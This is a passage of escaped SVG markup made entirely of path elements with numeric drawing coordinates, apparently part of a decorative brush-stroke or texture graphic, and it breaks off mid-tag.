d=\"M240.3,43.1c6.1.2,6.3-.2,8-.4C242.3,42.5,242,42.8,240.3,43.1Z\"></path>\n        <path d=\"M4.7,37.3c-.1-.3-.5-.7-3.5-.8C-.4,36.6.4,37.2,4.7,37.3Z\"></path>\n        <path d=\"M330.9,41.8c-3.8-.2-6.4.5-.9.5C328.6,42,331.8,42.1,330.9,41.8Z\"></path>\n        <path d=\"M324.5,40.8c5.4.7-5.9.3-7.8.6,6.7.1,11.6.1,16.7,0C328.9,41.3,328.8,40.9,324.5,40.8Z\"></path>\n        <path d=\"M0,33.6H0V34a24.24,24.24,0,0,0,3.4.2C3.3,34,2.2,33.7,0,33.6Z\"></path>\n        <path d=\"M7.9,31.5c-3-.2-4.9,0-7.3-.4-1.6.4,0,.8,4.6.5.6.8-4,1.8,3.7,2.6-.5-.2,1.4-.2,1-.4-2.9-.1-5.6-1.3.3-1.3C10.6,32.1,4.7,31.7,7.9,31.5Z\"></path>\n        <path d=\"M281.8,39.6c.2.2-3.9,0-4,.1,3.8,0,3,.3,5.9.4C285.3,40,285.1,39.7,281.8,39.6Z\"></path>\n        <path d=\"M310.4,40.6c.4-.3-1.7-.5-6.1-.6C304.8,40.3,306.8,40.5,310.4,40.6Z\"></path>\n        <path d=\"M302.2,39.1c-4.7-.2-.8.3-5.5.1,1.5.2.5.6,4.7.7C303.3,39.7,302.4,39.4,302.2,39.1Z\"></path>\n        <path d=\"M297.4,38.4c-8.1-.3-1.5.7,1.7.4C297.5,38.8,297.4,38.6,297.4,38.4Z\"></path>\n        <path d=\"M335,38.5c-1.1.1-.9.6,3.4.7A9.43,9.43,0,0,0,335,38.5Z\"></path>\n        <path d=\"M360.1,38.7a25.51,25.51,0,0,1-4.1,0c3.9.5-1.2.7-5.3.3-1.4.3,9.8.5,10,.3C355.6,39.1,365.3,38.9,360.1,38.7Z\"></path>\n        <path d=\"M304.7,37.3c.3.4,4,.5,6.3.8,1.6-.1,7.1-.4.7-.7C312.9,38,307.5,37.4,304.7,37.3Z\"></path>\n        <path d=\"M344,37.6c.1.3,4.2.4,6.1.6-.2-.2.5-.2,1.1-.3C347.2,37.9,347.3,37.7,344,37.6Z\"></path>\n        <path d=\"M347.9,35.8c1.5.2.5.6,4.8.7C352.6,36.1,352.2,35.8,347.9,35.8Z\"></path>\n        <path d=\"M291.2,34.6c.3-.4,3.8-.7-1.9-.6C293,34.2,284.7,34.4,291.2,34.6Z\"></path>\n        <path d=\"M280.1,33c1.1.7,9,.2,11.1,0C286.2,32.7,286.4,33.5,280.1,33Z\"></path>\n        <path d=\"M347.2,33.5c-4.3-.1-2.6.3-3.8.5C347.9,34.1,347.8,33.8,347.2,33.5Z\"></path>\n        <path d=\"M331.3,32.8c-.1.1-.2.3-2.6.2-.2.3,2.3.4,6,.5A8.62,8.62,0,0,0,331.3,32.8Z\"></path>\n        <path d=\"M338,30.8c-2.1.5-2.6.5-7.8.6,3,.3,6.6,0,10,.3C335.4,31.3,345,31.2,338,30.8Z\"></path>\n        <path d=\"M117,114.4c-.1-.1,1-.1,1.2-.2-5-.1-1.5.5-.8.6,0-.2,3.5,0,2.5-.3A20.13,20.13,0,0,1,117,114.4Z\"></path>\n        <path d=\"M312.3,113.8c5.3.2,13.1.2,9.6-.1C321.3,114.2,312.6,113.3,312.3,113.8Z\"></path>\n        <path d=\"M227.3,108.8c-.7.6,1.8.9-1.8,1.2,2.8.1,2.1.3,5.9.4C227.6,109.9,235.6,109,227.3,108.8Z\"></path>\n        <path d=\"M345.3,108.6c-.1-.1-.3-.1-1.5-.1.7-.3,6.3-.1,6.6-.4-5.9-.2,1.2-.4-3.3-.6-2.1.2-.4.8-4.9.8.2-.2,2.1-.6-2.2-.9.4.3-.3.4-2.3.5-2.3-.4,2.9-.6-.7-.8-3.3.7-15,2.2-15.6,2.8,2-.1-.1-.6,5.2-.4-1.5.4-.2.3,4.4.3-.2.3-4.7.1-3.8.5,5.6,0,11.1.4,7.5.6,4.9,0,4.4-.2,8.5.2a17.18,17.18,0,0,1,5.2-.4,2.23,2.23,0,0,0,1.4,0c-1.5-.2-4.9-.3-6.1-.6,3-.5,2.4-1.3,6.9-1.6C346,108.2,348,108.6,345.3,108.6Z\"></path>\n        <path d=\"M407.8,111.8c-4.3.5-10.5-1.5-16.4-1.2,7.8.5,7.6,1.4,16.9,1.8C406.2,112,412.1,111.9,407.8,111.8Z\"></path>\n        <path d=\"M367.7,108.8c-5-.1,2.7-.3-1.7-.4-9.8.5-1.9,1.9-5.1,2.1,2.8,0,6.2.6,8.6.3C360.7,110.3,364.3,109,367.7,108.8Z\"></path>\n        <path d=\"M542.5,111.7c2.1.4-5,.5-.7.7a17.63,17.63,0,0,1,3.9-.4c.1.3-2.4.3,1.8.5C550.3,112.4,545.3,112,542.5,111.7Z\"></path>\n        <path d=\"M372.5,107.9c-9.1-.3-.3.9,1.9.6C371.3,108.4,373.4,108.1,372.5,107.9Z\"></path>\n        <path d=\"M347.2,104.4c3.2,1,2.4,1.5-5.3,1.8,3.6.1,5.6.3,6.1.6a52.3,52.3,0,0,0-5.6,0c.4.3,2.5.5,6.1.6,3.2-1,.7-1.9,4.5-2.8C348.6,104.7,348.6,104.2,347.2,104.4Z\"></path>\n        <path d=\"M263.7,36.5c6.8.2,2.1.2,1.8.5,3.1,0,4.6.2,4.5.4a15.72,15.72,0,0,0-3.8.5c4.9,0,5.8-.3,9.3-.4a49.56,49.56,0,0,1-7.4-.5c.2-.3,4.2-.2,5.3-.3-3.7-.1-6.1-.2-6-.5C265.6,36.2,263.2,36.2,263.7,36.5Z\"></path>\n        <path d=\"M369.4,60.3c-1-.3-2.2-.4.9-.5-1.3-.2-4.7-.3-7.3-.4C362,59.8,367.2,60,369.4,60.3Z\"></path>\n        <path d=\"M174.1,64.2c4.8.3.4,1.2,8.4,1.6-2.3.2-4.3-.2-7,0,8.7.6,2.6,1.2,8.8,2.1-3.6-1,5.3-2-4.1-3a14.92,14.92,0,0,0,2.2-.5C181,64.4,175.8,63.9,174.1,64.2Z\"></path>\n        <path d=\"M164.2,48.1c.2-.1.3-.1.4-.2C164,47.9,163.7,48,164.2,48.1Z\"></path>\n        <path d=\"M329.2,36.7c-4,.6-9,.4-17.6.5,3.3.4,5.3.1,7.2.3-3.7.1,2.7.5,3.4.7-1.2.8-4.4,1.3.4,2.1-2.5,0-5-.4-5.7-.1,5,0,1.6.5,6.1.6-2.3-.6-.8-.1,4.1,0-1-.3-2.6-.6-3.6-1,1.5-.1,5.2-.1,6.8-.2-4.3-.2,3.1-.1,1-.4-4.1-.2-3.6.1-7,0-.1-.1-1.3-.2-1.6-.3,3.3,0,6.5,0,6.7-.3a36.81,36.81,0,0,1-4.2-.1c2.6,0-3.8-1,3.8-.5.1-.2-1.9-.6,2.5-.4C327.4,37.2,336.5,37,329.2,36.7Z\"></path>\n        <path d=\"M403.3,73.5c-1.3-.4.4-.6,2.1-.7-4.5-.2-8.8-.4-11.7-.7A72.1,72.1,0,0,1,403.3,73.5Z\"></path>\n        <path d=\"M361.2,99.8c-4.4-.2-3,.7-2.3.6C360,100.2,362.6,100.2,361.2,99.8Z\"></path>\n        <path d=\"M310.5,99.1l-.4-.4c-3.5-.1-2.9.1-7,0-.5-.2.9-.5-3.2-.5a22.4,22.4,0,0,0,4.8.8C305.8,98.5,308.6,99.1,310.5,99.1Z\"></path>\n        <path d=\"M502.5,102.5c3.8-.5,1.4-.8,4.5-1.2-4.6,0-5.9,1-7.6,1.1C500.4,102.5,501.4,102.5,502.5,102.5Z\"></path>\n        <path d=\"M360.4,95.7c6.3.3,2.6-.4,8.2-.1,3.1.3-1,.5,2,.7-1.5-.4,9.4-.2,6.6-.4a78.39,78.39,0,0,1-8.8-.5c2.5-.1,2.2-.5.8-.6-2.4.1-1.2.9-6.6.4C363.6,95.5,358.5,95.3,360.4,95.7Z\"></path>\n        <path d=\"M120.1,89.5c.8-.1,2.8-.1,5.5-.1a29.61,29.61,0,0,0-4.7-.7C125.3,89.1,116,89.5,120.1,89.5Z\"></path>\n        <path d=\"M382.1,92c1.8.6.3.8,1.4,1.6,3,.2,7.5.6,7,0-1.6-.1-5.3-.3-6.2-.7,3.6-.3,3-1.2,1.2-1.8-2.2.2.3.1.4.4h-4.1c-3-.5-4.1-1.1-8.5-1.7-.1-.6,7.4-.1,7.6-.8-8.7-.3-7.1-.8-6.9-1.5,1.4,0,2.9.1,4.3.1-4-.5,1.6-.6-5.4-1.3h4.2c4,.3,7,2.2.1,1.7,5.1.9,9.1,1.5,4.8,2.3,2.5,0,5,.4,5.7.1-2.5-.5-3.2-1.1.1-1.4-7.8-.4-5-1.3.1-1.4,0,.3.2.5,3.3.6,4.2-.5,5.8-.7-1.3-1.4-1,.3,5,.9.9,1-2.1-.1-3.6-.3-4.5-.4,3.2-.2,1.8-.3.7-.7,6.2.2,3.5-.3,6.6-.4-3.1-.3-5.9.1-7.3-.4,1.3-.4-3.9-.9,1.8-1.2,2.3.2,2.9.5,6.2.7.4-.4-5.3-.4-4.9-.8,3.8.1,3.5-.2,3.9-.3-5.2-.7-1.8-1.5-8.8-2.2,2.6-.1,1.5-.5,3.6-.6-.2.2.7.4,3.2.5-5.6-.8,1.1-1.6-8.4-1.7-1-.5,7.9-.5,3.3-1-.3.1.1.2-1.2.2.1-.2-1.8-.3-1.8-.5,6.1,0-2.4-1.2,4.4-1.3-5.8,0-3-.5-6.2-.7-2.9.6-4.4,1.4-6.6,2-3.2-.8-2.7-1.2-3.2-2,2.4,0,6.1.8,5.8.2-9.1-.6.1-1.1-5.7-1.8-1.2.5.7,1.2-7.4,1,7.1.2-.9.4-.9.5,8.4.3,1.9,1,5.6,1.7-6-.1-2.8.2-.7.7-7-.3-4.2.3-8,.4,14.9,1,2.7,2-.3,2.3,1,0,4.1.3,5.5.4-.2.3-10,.1-5.1.5,1.4-.1.1-.4,3.9-.2.5.4,1.4.8-2,.8,2.2.1,4.6.3,4.6.5a13.78,13.78,0,0,1-4.7.4c1.2.1-1.7.7,1.3.5,9.1-1,8.4,2.6-2.4,2,1.1.3,6.1.4,6.3.8-3.4.1-3,.6-7.8.6.5.6,5,1.1-.2,1.3a54.5,54.5,0,0,0,7,0c1.7.3,4.8.7.7.8a27.48,27.48,0,0,0-7.3-.4c3.7.3.7,1.2-.3,1.2,1.5.4,4.5,0,7.1.2.9.3,4.1.5,6.3.8-1.3.1-2,.3-3.9.4-2.5-.2-3.5-.6-6.3-.8,3.1.5-2.2.5.9,1,3.4.2,5.1-.2,5.7.1-.6.5-3.9.5-2,.9,1.9,0,3.8.1,5.7.1.5-.5,0-.7.4-1.1,2.1,0,5.3.2,5.6,0C374.7,92.8,373.4,91.8,382.1,92Z\"></path>\n        <path d=\"M359.9,82.1h-.3a.19.19,0,0,0,.27,0h0Z\"></path>\n        <path d=\"M492,95.4c2.4,0,3.8.2,4.3.1-3.2-.1-.3-.6-4.7-.7C491.7,95.1,491.9,95.2,492,95.4Z\"></path>\n        <path d=\"M204.4,85.9a25.51,25.51,0,0,1-4.1,0c1.7.5-2.1.1-2.6.3,1.7.1,3.3.2,4.5.3-3.6-.2-3.2.5-.7.7-1.1-.3.2-.4,4-.2.7.5,1.6.5.8.9,5.9.1,2.8.7,7.7.8-5.6-.7-.2-1.4-11.5-2C200.6,86.3,209,86.3,204.4,85.9Z\"></path>\n        <path d=\"M392.2,89.3c-7,.2,5,1.2,0,1.5-4.8-.2,3.4-.3-3.1-.4,1,.2-1.1.6,2,.7C401.2,90.9,390.6,89.7,392.2,89.3Z\"></path>\n        <path d=\"M327.2,89.6c1.9,0,3.8.1,5.7.1C334.1,88.7,332.4,89.5,327.2,89.6Z\"></path>\n        <path d=\"M408.2,90.1c-1.8,0-7.3,1.1-1.9,1C403.4,90.8,409,90.5,408.2,90.1Z\"></path>\n        <path d=\"M442.5,89.7c.4.5-8.9,2.1,1.6,1.8C445.8,90.9,447.1,90.6,442.5,89.7Z\"></path>\n        <path d=\"M213.8,83.9c-7.4-.2-8.4-1.8-3.3-2.1,1.2.5.7.8,2.3,1-.1-.2,3.9,0,4.1-.1-.5-.2-1.3-.8-4.8-.8,4-.1.7-.5,2.1-.7-4.2,0-7.7-.5-4.6-.5a4,4,0,0,0,1.6.3c8.4-.9-5.6-2.6,5.4-3.4-2.1-.3-6.9-.1-7.2-.3,7.5-.3-3.4-1.6,5-2.2-1.7-.1-4-.1-4.4-.2,3.8,0,1.9-1.1-1-1.1,1.1-.4,4.7-.7,10.9-.3-6.1-.6,2.2-.5-.8-.9-2,.5-4.2-.4-8.8-.5-.5.6-1.6.7,2.4,1.1-9.9.9-2,2.7-5,3.8-3.5-.1-4.2.1-7.1-.2,3.9.5,6.1,1.2,2.7,1.5,4,.1,4.3.4,4.8.7-1.8,0-2.1-.2-4.4-.2.1.2.9.3,1.7.4a27.48,27.48,0,0,1-3-.2c2.3.4-3.4.5.6.7.6-.1,1.3-.2,2.6-.3-.1.2,1.8.3,1.8.5-5.5-.3-2.4.2-6.9.1,4.2.5,4.7.7,2.4,1.1a30.64,30.64,0,0,1,5.9.3c-6.8-.5-5.2.6-2,.9-1.9,0-3.2-.1-4.4-.2,1.7.8,1.5,1.4-2.5,1.9,6.3.1,4.7.8,3.7,1.1-1.7-.1-3.3-.2-4.4-.3,4.1.3,3.5-.4,1-.4,1.4.6-4.4.3-6.6.4a123.68,123.68,0,0,0,14.4.5c-.6-.3-3.8-1.4,1.9-1.1-4,0,2.3.2,1.7.4-.7.5.6.5-.7.9a32.42,32.42,0,0,1,4.4.3c0-.2,4.6,0,4-.2C211,85.4,220.4,84.6,213.8,83.9Z\"></path>\n        <path d=\"M438.3,89.6c-.4-.4-5.4-.5-7.7-.8C426.5,88.3,433.2,89.6,438.3,89.6Z\"></path>\n        <path d=\"M307.7,86.4c1.9,0,5.6.5,5.8.2-5-.5-.6-.9,3-1.4-3.5-.1-2.9.1-7,0,3.2-.1,2.1-.6-2.1-.8C308.2,85.2,310.1,85.7,307.7,86.4Z\"></path>\n        <path d=\"M175.7,80.1c-8.4-.3,2.3-.3-4.7-.7.6.2-1.7.2-2.5.3,7.9.4-1.4,1.1,4.1,1.5C171.9,80.7,172.1,80.3,175.7,80.1Z\"></path>\n        <path d=\"M178.7,80.4c.2.4-4.9-.3-4.1,0,1.3.1.5.3,2,.7,1.9,0,3.8.1,5.7.1C181.7,80.9,182.8,80.5,178.7,80.4Z\"></path>\n        <path d=\"M322.1,83.9c.5-.3,2.4.2,4.4.2,1.1-.4-5-.3-6.1-.6-.6-.3,7.3-.3,2.2-.6.7.3-4,0-4,.2C321.9,83.3,316.9,83.6,322.1,83.9Z\"></path>\n        <path d=\"M480.2,86.8c4.4.2,2.5-.2,6.9-.1l-.3-.3C483.1,86.4,482.9,86.7,480.2,86.8Z\"></path>\n        <path d=\"M328.7,81.8c-.3-.6,1.7-1.2-2.9-1.7,4.1.2,3.5-.1,7,0,.1-.2-1.8-.3-1.8-.5-7.9,0-7.7.2-13.9,0-.1.5,3.1.7-.6.9,10.1.3.8,1.2,4.1,1.5,3.5-.1-.2-.9,6.3-.7C330.5,81.6,324.6,81.6,328.7,81.8Z\"></path>\n        <path d=\"M180.8,76.4c-1.5-.4,1.3-.5.6-.9-6.1,0,1.9-.6-3.5-.8C174.3,75.1,177.2,75.9,180.8,76.4Z\"></path>\n        <path d=\"M317.6,75.6c-4.8-.1-1.9.4-3.7.6,1.5.3,4.6.4,4.9.8-5.9.1-.8.7-4.7,1,3.1,0,4.6.2,4.6.4a24.32,24.32,0,0,1-2.7,0c-.1-.2-1.3-.3-3.1-.4,1.4.5-.1.7-3.5.8,4.9-.1,1.2.4,4.5.4,3-.1-2.1-.9,5.1-.5-.3.1-1.8.2-1,.4,6.1.2,7.1.1,11.5.5,1.1-.5-5.1-.5-4.9-.9,5,.2,7.5.6,8.4.1-5.6-.1-8.6-.4-9.1-.9,6.8.4,1.9-.7,3.4-.9,3.6.1,4.6.3,5.6,0-3.7,0,.8-.6-4.6-.5-1.2.2,4.6.5.4.4-5.4-.6-3.9-1.5-2.9-1.7-9.2-.5-4.7,1.1-4.2,1.5a23.82,23.82,0,0,1-2.8-.1c.9-.3-2.5-.4-3.3-.6C315.7,75.9,318.1,75.9,317.6,75.6Z\"></path>\n        <path d=\"M125.9,72.3c5.2,0,3,.4,7.3.4,1.9-.1-1.1-.8-3.1-.4-.5-.2,6.5-.6-.7-.8,2.1.6-2.2.8-5.3.3-3.9,0,3,1.1-3.4.9,4.4.4,3.3.6,5,1C130.1,73.5,121.2,72.6,125.9,72.3Z\"></path>\n        <path d=\"M277.7,74.5c-2.1.2-9.2-.1-6.9.1,7.5.2,3.2,1,7.8.9C277.5,75.2,277,74.8,277.7,74.5Z\"></path>\n        <path d=\"M123.3,69.5c-5.4,0-14.7-.4-18.3-.3,7.2.2,7.8.9,13.6,1.2C114.9,69.7,119.3,69.6,123.3,69.5Z\"></path>\n        <path d=\"M314.7,72.3c-2.7.4,2.4,1.2-1.5,1.4,9.5.2,4.8.5,7.9,1,2.7.1,3-.1,5.6,0a5,5,0,0,1-.6-.7c-5.7-.2-2.4-.8-2.2-.9,1.9.1,2.9.2,5.8.2.3-.3-2.8-.3-1.9-.6-4.7-.2-.8.3-5.5.1.9-.3-2.2-.3-1.9-.6,7.9-.2,6.8-1.1,4.1-1.7C315.3,70.8,321.9,73.3,314.7,72.3Z\"></path>\n        <path d=\"M330.1,69.3c-.4.2-.1.5-3.9.3-3.2-1.2,2.4-1.7,7.2-2.9,5.5.3-1.8.8.8.9a21.29,21.29,0,0,1,4.3.1c-1.2-.6,1.8-.8-2.5-1.3-.1.1-.2.3-2.6.2-2-.4.6-.5-2-.7-6.5.1-7.7-.4-7.1-.8a23.81,23.81,0,0,1-4.7.1c1.8-.3-.8-.4.8-.6,2.6.1,4.1.3,3.9.5a9.45,9.45,0,0,1,2.8-.8c1.2-.4-3.8-.4-3.4-.7,5.4.1,7.3-.3,5-.7-6.9-.3-1.4.6-6.5.5-1.3-.5,5-.5.5-1a40.91,40.91,0,0,0,7,0c-4.2-1-.7-1.4-4.7-2.2,2.8.1,2.1.3,5.9.4-3.2-1.6-.5-3.1-5.5-4.7,5.1.2.8-.7,5.3-.4-5.9-.6,2.4-1-4.4-1.8,0,.1-1.7,0-1.5-.1,3.8,0,3,.3,5.9.4-1-.2,1.1-.6-2-.7,0,.1-.2.3-2.6.2-.3-.8,2.5-1.3,5.4-1.7,2.1.4,1.5.5-.8.6,2.7.1,3-.1,5.6,0-4.3-1.1-12.6-1.6-12.2-2.8-5.7-.3-3.1.2-6.8.2.3.3,4,.5,4.8.8-6,.6.6,2.1,1.1,2.9a36.35,36.35,0,0,0-5.9-.3c-.1.3,3,.4,4.7.7-7.2,0,.3,1.3-5.7,1.4.2-.4-8.6-.7-7.1-.2,10.6,0,10.4,2,10.6,2.5,3.6.1-.6.9,3.8,1.2-1.2.1-5.2-.1-4,.2,4.7,0,4.8.9,8.1,1.3-1.8,0-1.8.1-4.2,0,0-.3-.4-.6-4.7-.7,3.6.5,1.6,1.1.3,1.7a22.65,22.65,0,0,0-6.2-.5c4.1.2,0,.5.6.7,1.7,0,3.5.1,5.2.1-.6.3-.6.7,1.3.9-4.4-.2-2.8-.1-7.1-.2.2.3,2.7.4,2,.7-5.3-.2-6.1,0-5.2.4,3.4-.1,2.6-.2,8.1-.3.6.2,2.3.5.6.7-6.6-.6-.7.2-7.1-.2-1.3.5-3.8.9-5.7,1.4,5.4.2.5-.6,6.7-.3a4,4,0,0,1,.6.7c-3.3-.1-5.3-.1-5.5.1,13.5.2,2.9,2,13.6,2.8-2.2-.1-3.7-.2-5.9-.4.6.2-1.7.2-2.5.3,2.1.3,4.1-.1,5.8.2.6.5-.5.3-2.7,0-.7.4,7,.4,6.2.8-9-.3,1.2.6-5.1.5,6,.4.1.5.9,1,6.1.3-.3-.6,3.8-.5.2.1,2.6.2,3,.3,3.5,0,7.9,0,9.5-.2-9.3-.2,1.1-.3-3.4-.7a13.45,13.45,0,0,0,4.2,0C331.5,69.7,332.8,69.4,330.1,69.3Z\"></path>\n        <path d=\"M330.6,65.1c.6-.1-2.2-.6.9-.5,1.5,0,3.6,0,1.3-.1-1.9,0-3.8-.1-5.7-.1C329.5,64.6,325.9,64.8,330.6,65.1Z\"></path>\n        <path d=\"M330.6,55.6c.4,0,.9.1,1.4.1C331.5,55.7,331,55.6,330.6,55.6Z\"></path>\n        <path d=\"M334.3,70.9c-1.1.3-2.9-.2-4.3-.2a10.17,10.17,0,0,1-2.7,0c0,.5,5.6.3,6,.5-4.2,0-3.8.5-4.8.9C332.7,72,335.1,71.2,334.3,70.9Z\"></path>\n        <path d=\"M100.6,68.9c-4,.2,5,1.1,3.5.8C101.7,69.3,105.1,69.2,100.6,68.9Z\"></path>\n        <path d=\"M250.8,72.3c-1,.3,6.7,1,6.1.6C251,72.9,256.6,72.3,250.8,72.3Z\"></path>\n        <path d=\"M241.5,72.8c4.4.2,2.5-.2,6.9-.1-.9-.2,1.2-.5-1.9-.6C248.8,72.7,241.7,72.4,241.5,72.8Z\"></path>\n        <path d=\"M150.4,70.4c-2.5.6,13.8.6,7.1.2C157.5,71.1,153.1,70.4,150.4,70.4Z\"></path>\n        <path d=\"M128.7,69.2c-.9.1-3.5.7-.9.5.1-.4,5.5.4,5.6,0a26.2,26.2,0,0,1-2.8-.1C130.1,69.6,130.7,69.3,128.7,69.2Z\"></path>\n        <path d=\"M136.2,68.3c5.7.2-.1.3.6.7,4.6,0,4-.6,10.8-.4-2.8-.1-2.1-.3-5.9-.4.4.2-1.2.2-4.1.1A6.55,6.55,0,0,0,136.2,68.3Z\"></path>\n        <path d=\"M151.8,65.6c-1.2.3,3.1.2,3.4.4.3-.1.6-.1.9-.2C154.2,65.8,153,65.7,151.8,65.6Z\"></path>\n        <path d=\"M154.8,66.1c-2.7-.1-2.9-.4-5.7-.5-.9.4,4.7.8-.8.7-4.7-.5,2.5-1-3.9-1.3-3.6.5-1.6.3-.3,1.2,7.5.3,4.6.5,12.1,1.1C152.9,66.8,153.1,66.5,154.8,66.1Z\"></path>\n        <path d=\"M155.2,66c-.2,0-.3.1-.4.1a.79.79,0,0,0,.4-.1C155.2,66.1,155.3,66,155.2,66Z\"></path>\n        <path d=\"M337,70.8c4.1.4.7.5,3.5.8C343.3,71.4,340.9,70.9,337,70.8Z\"></path>\n        <path d=\"M504.7,75.1C513,74.8,500.8,73.7,504.7,75.1Z\"></path>\n        <path d=\"M111.9,64.4c3.7.6,5,1.3,11.2,1.7C117.3,65.5,118.7,64.6,111.9,64.4Z\"></path>\n        <path d=\"M478.4,72.1c-.9.6,2.7,1.4,6.9,1.6C481.2,73.3,483.5,72.5,478.4,72.1Z\"></path>\n        <path d=\"M142.5,62.8c-.8-.1-1.7-.3-3.1-.4-4,.2,2.4.5,4.7.7.8,1-2.8,1.1,1.7,1.9.9-.2,5.5.4,7.5.6,1.3-.6-9-1.2-1.3-1.4a22.48,22.48,0,0,0,5.9.4c-1.8-.2-3.8-.4-6.1-.6-1.4-.5,1.9-.6,3.5-.8-2.1-.1-5.2-.1-5.8-.2-.1-.2,9,0,3.9-.3-2.4.2-4.8-.6-9-.7,2.6.5-3.5.1-3.9.4,5.5.2-.1.4,4.8.7A7.34,7.34,0,0,0,142.5,62.8Z\"></path>\n        <path d=\"M401,70.9c4.1,0,4.3,0,8.5.2,1.6-.5-8.2-.3-7.6-.7.8,0,1.5-.1-.1-.1C397,70.4,403.4,70.7,401,70.9Z\"></path>\n        <path d=\"M250.3,67c3.4.1,1.8.5,4.7.7.9-.4-3.3-.8,1.8-1.2C252.5,66.4,253.3,66.9,250.3,67Z\"></path>\n        <path d=\"M115.9,64.2c.3-.4-1.2-.7-4.9-.9,2.2.4,4.2.5.6.7C113.5,64,114.7,64.1,115.9,64.2Z\"></path>\n        <path d=\"M102.2,62.9c-2.5.1.9.3,1.9.6-1,.1-8.3.1-3.9.3a19.39,19.39,0,0,1,4.1-.1c1.3-.1,1-.4,2.3-.5A36,36,0,0,1,102.2,62.9Z\"></path>\n        <path d=\"M414.4,70.3c-4.4-.2-5.1,0-8.4-.1.4-.2,2.7-.5-2-.7-1.8.1-.4.5-2.2.6,6,0,3.4.5,8.8.5C408.1,70.2,416.9,70.8,414.4,70.3Z\"></path>\n        <path d=\"M444.3,71.2c3.5-.1,2.2-.8.6-.9a15.43,15.43,0,0,1-2.8-.1C445.8,70.7,440.7,70.9,444.3,71.2Z\"></path>\n        <path d=\"M279.2,66.6c3.2-.3,5.2.4,7.4.5.7-.6-2.5-1.1.2-1.3C284.1,66,274.1,66,279.2,66.6Z\"></path>\n        <path d=\"M212.2,64.8a17.8,17.8,0,0,1-3-.2,26.15,26.15,0,0,0,2.8,0c-1.4,0-2.8-.1-4.2-.1,1.5.2,1,.6,3.4.7C210.7,65,212.6,65,212.2,64.8Z\"></path>\n        <path d=\"M113,62.5c-.5.2,3,.8,4.7.5-2.5-.1-3.4-.3-3.2-.5,1.9,0,3.2.1,4.4.2C118.2,62.2,115.3,62.4,113,62.5Z\"></path>\n        <path d=\"M45.6,60.2c4.9-.1,1.2.4,4.6.4-1.8-.5.5-1.3-4.3-1.7C47.3,59.4,47.9,59.8,45.6,60.2Z\"></path>\n        <path d=\"M133.7,60.7c-9.2-.3-9.2-.5-17.4-.8-1.9,0,.2.4-2.5.4-2.4-.2,1.9-.7-4.9-.9,4.7,1.1,1,1.7,4.8,2.3,0-.2,5.4.2,7.2.3-.5-.6,6.3-.6.3-1.2,5.2,0,10.4-.2,12.8.4a20.27,20.27,0,0,0-2.7,0c2.1,0,5.3.2,5.6,0C134.4,61.2,133.5,61,133.7,60.7Z\"></path>\n        <path d=\"M353.4,65.7c3.7.1,6.1.2,6,.5-.9-.1-5.7-.4-5.7-.1a33.79,33.79,0,0,1,4.5.3c0-.3,6.6,0,5.2-.4A79.44,79.44,0,0,0,353.4,65.7Z\"></path>\n        <path d=\"M149.1,61c7.9-.3-.5-.7-2.7-1.5,5.7-.3-.1-.6,3.4-.9a33.9,33.9,0,0,1-4.5-.3c0,.1-.2.3-2.6.2,1.1.3,3.4.6-2.4.5,1.9-.5-1.7.1-7.1-.2.4.2-.2.4,1.8.5,0-.7,3.5.7,5.8.2-3.6-.1-.4-.4,2.5-.3.3.6-5.3.6-6,1.1,7.6.2,6.9.9,3.7,1.1,3.1.3,2.7,0,5.8.2.4-.6,10.4-.2,13.4-.6C155.9,60.9,150.9,61.2,149.1,61Z\"></path>\n        <path d=\"M333.5,65.2c1.1.1,2.8.1,2.9.2-1.8,0-2.8.1-2.5.3,3.8.1,12,0,5.3-.3-.2.4-3.7.1-1.5-.1A34.6,34.6,0,0,0,333.5,65.2Z\"></path>\n        <path d=\"M252.7,63.7c-.6-.5,6.1-.3,6.6-.7-2.3-.3-3.3.1-4.4-.2-1.6-.5,4.4-.6,1.9-1a15.43,15.43,0,0,1-2.8-.1C255.1,62.4,251.8,63.2,252.7,63.7Z\"></path>\n        <path d=\"M252.7,63.7c.1.1.2.1.4.2C252.9,63.8,252.8,63.7,252.7,63.7Z\"></path>\n        <path d=\"M60.3,59.4c-1.9-.6.6-.7-2.4-1.1C58.8,58.8,52.7,59,60.3,59.4Z\"></path>\n        <path d=\"M48.1,58.3c3.4.1,3.5.4,6.1.6-3.1-.5,6.1-.4.7-.7-.6.1-1.3.2-2.5.3A16.74,16.74,0,0,0,48.1,58.3Z\"></path>\n        <path d=\"M343.9,64.4a40.66,40.66,0,0,0-8.1.3c3.4.1,3.5.4,6.1.6a17.85,17.85,0,0,0-3.4-.7C340.9,64.5,345.6,64.7,343.9,64.4Z\"></path>\n        <path d=\"M135.7,59.9c-1.7-.1-1.7-.2-1.7-.4-6,0-4.2-.5-8.9-.6C126,59.3,134.1,59.9,135.7,59.9Z\"></path>\n        <path d=\"M365,64.7c.5-.2-4.3-.7-4.6-.4,3.2.1.4.6,4.7.7-.1-.3,5.4,0,5.3-.3a21.62,21.62,0,0,1-3-.3C368.1,64.6,367.5,64.8,365,64.7Z\"></path>\n        <path d=\"M357.6,64.1a79.55,79.55,0,0,1-10-.3c-.9.4-.2.5,3.5.8a29.54,29.54,0,0,1,5.4-.2c.1.1,1.3.2,1.4,0C355.4,64.4,358,64.3,357.6,64.1Z\"></path>\n        <path d=\"M79.6,57.7c.3.4,6.4.6,7.8.9C87.3,58.1,82.7,57.9,79.6,57.7Z\"></path>\n        <path d=\"M70.6,55.4c-1.8-.1-3.4-.1-3-.3-1.2.2-2.1,1-1.6,1.4a8.16,8.16,0,0,1,2.7,0c-.8.4-3.7.5-4.8.9,1.9.3.9.7,4.9.9C69.6,57,72.3,56.5,70.6,55.4Z\"></path>\n        <path d=\"M0,56.3c1,.1,2.5-.1,0-.7Z\"></path>\n        <path d=\"M100.5,57.8c-2.5.2-.3.7,2.2.9C98.5,58.2,106.2,58.1,100.5,57.8Z\"></path>\n        <path d=\"M104.7,57.8l.2.2a6.8,6.8,0,0,1,1.5.1c4.7.2.8-.3,5.5-.1,1.9.2.8.7,3.5.8-1.9-.4,2-.2,2.4-.4-3.1-.1-1-.4-1.9-.6,4,.2,6.2.3,9.9.2-3.3-.5.2-1.1-2.3-1-2.3.2.2.8-6.5.5,1.1-.1,1.6-.3.9-.5-4.9,0-10.9.3-7.6.8C106.5,57.8,107.4,57.7,104.7,57.8Z\"></path>\n        <path d=\"M340.2,63.3c5.9.2-1.2.4,3.3.6-.2-.2,3.7-.1,2.5-.4C342.5,63.6,342,63,340.2,63.3Z\"></path>\n        <path d=\"M127.9,57.3c-3.1.2,1.8.8,3.7,1.1C133.7,58.2,128.9,57.7,127.9,57.3Z\"></path>\n        <path 